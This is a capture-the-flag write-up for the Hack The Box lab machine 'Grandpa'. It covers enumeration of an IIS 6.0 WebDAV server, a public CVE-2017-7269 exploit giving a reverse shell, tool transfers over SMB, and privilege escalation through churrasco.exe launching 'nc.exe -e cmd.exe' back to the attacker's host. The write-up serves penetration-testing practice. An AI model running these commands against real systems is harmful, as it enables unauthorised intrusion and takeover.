Grandpa HTB
IP
10.10.10.14initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.14 | cut -d"/" -f1 | tr '\n' ','we can see we only have port 80 up and running on the target, Lets run a more in-depth nmap scan and see if we can find anything else on the machine
sudo nmap -sCV -p80 -oA Port_scan 10.10.10.14results
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
| Server Type: Microsoft-IIS/6.0
| Server Date: Sat, 30 Dec 2023 02:16:39 GMT
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.37 secondsWe can see the following
We have a Microsoft IIS server version 6.0 (outdatted)
Possible Vulnerability: CVE-2017-7269
the WebDAV protocol is enabled meaning this enables users the ability share, copy, move and edit etc files through the web server
Lets check out the web server
we can see the following
we can see the website administrator has not created a defualt page
for good measures well use feroxbuster and see if we can find anything interesting
feroxbuster -u http://10.10.10.14 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x asp,aspx -o dirs.txt/images
Since we now webdav is enabled, this seems like a good place to find a attack vector
we have the supported methods, we found in our nmap scan
TRACE: Echoes back the received request, can be useful for debugging
COPY: Copies a resource from one location to another
PROPFIND: Retrieves properties of a resource
SEARCH: Performs a search based on a given query
LOCK: Locks a resource, preventing other processes from modifying it.
UNLOCK: Releases a lock on a resource
DELETE: Deletes a specified resource
PUT: Uploads a specific resource
MOVE: Moves a resource from one location to another
MKCOL: Creates a new collection (e.g a directory)
PROPPATCH: Modifies the properties or a resource
we can do some basic enumeration
Lets check if we can upload a file and what exttentions the target will allow us to
we can use davtest
davtest -url http://10.10.10.14
we can see we have a successful connection to the webdav server, but we cannot upload (PUT) anything to the server to the server
We did find CVE-2017-7269 after a bit of reading, this could be our attack vector
Quick google search we find a working exploit
For this to work we need to set up a netcat listner and run the exploit
start a listner
rlwrap -cAr nc -lvnp 9001run the exploit
python2 exploit.py 10.10.10.14 80 10.10.14.28 9001we now have a shell on the target
Lets gather some information of the system
systeminfo
we can see we are dealing with an old machines that has not been updated for some time, we can feed this to wesng and see if there are any exploits we can utilise
sudo /opt/wesng/wes.py --update
sudo /opt/wesng/wes.py systeminfo > possible_exploitswe now have a file of possible exploits we can run on the target
We also utilise windows-exploit suggestor as i have had the best luck from it
sudo /opt/Windows-Exploit-Suggester-python3/windows-exploit-suggester.py --update
sudo /opt/Windows-Exploit-Suggester-python3/windows-exploit-suggester.py -i systeminfo -d 2023-12-30-mssb.xlsxwe have te following results
MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]
https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]
https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E]
MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*]
https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*]
https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*]
https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E]
MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*]
http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[E]
MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]
http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M]
MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]
https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]
http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]
http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]
http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]
http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]
http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M]
MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*]
http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*]
http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
[M]
MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*]
http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E]
MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*]
https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*]
https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E]
MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E]
MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*]
http://www.exploit-db.com/exploits/34458/
[*]
[E]
MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]
http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*]
[M]
MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M]
MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E]
MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E]
MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M]
MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M]
MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M]
MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M]
MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M]
MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M]
MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M]
MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M]
MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M]
MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E]
MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]
http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]
http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[M]
MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E]
MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M]
MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M]
MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M]
MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M]
MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M]
MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M]
MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M]
MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M]
MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M]
MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M]
MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M]
MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M]
MS08-078: Security Update for Internet Explorer (960714) - Critical
[*]
done
Lets get some information about our current user
whoami /all
Possible attack (juicy potato)
Lets try ms15-051 using the following exploit code
Once we have downloaded the code and unzipped it onto our local machine we need to transfer this to our target machine
Lets start a smb server on our local machine
sudo python2 /opt/impacket-0.9.19/examples/smbserver.py shrek123 ./ -smb2supportLets copy the exploit to our target machine
copy \\10.10.14.28\shrek123\ms15-051.exe C:\TempTransfered over no problem we just now need netcat for windows so we can start another shell
transfer over netcat via smb
copy \\10.10.14.28\shrek123\nc.exe C:\TempWhile trying run the exploit, ran into some problems
Since we have the SeImpersonatePrivilege enabled and it is a Windows server 2003 we can use the following exploit 'churrasco.exe` to perform some token manipulation
https://github.com/Re4son/Churrasco/raw/master/churrasco.exeLets download our files again
copy \\10.10.14.28\shrek123\nc.exe C:\wmpub
copy \\10.10.14.28\shrek123\churrasco.exe C:\wmpubquick note I had problems with
nc.exeand the only version I found that worked was /usr/share/seclists/SecLists-master/Web-Shells/FuzzDB/nc.exe (seclists nc.exe version)
now once we run the exploit
churrasco.exe -d "c:\wmpub\nc.exe -e cmd.exe 10.10.14.28 9005"we can see we have established another shell as the user
Last updated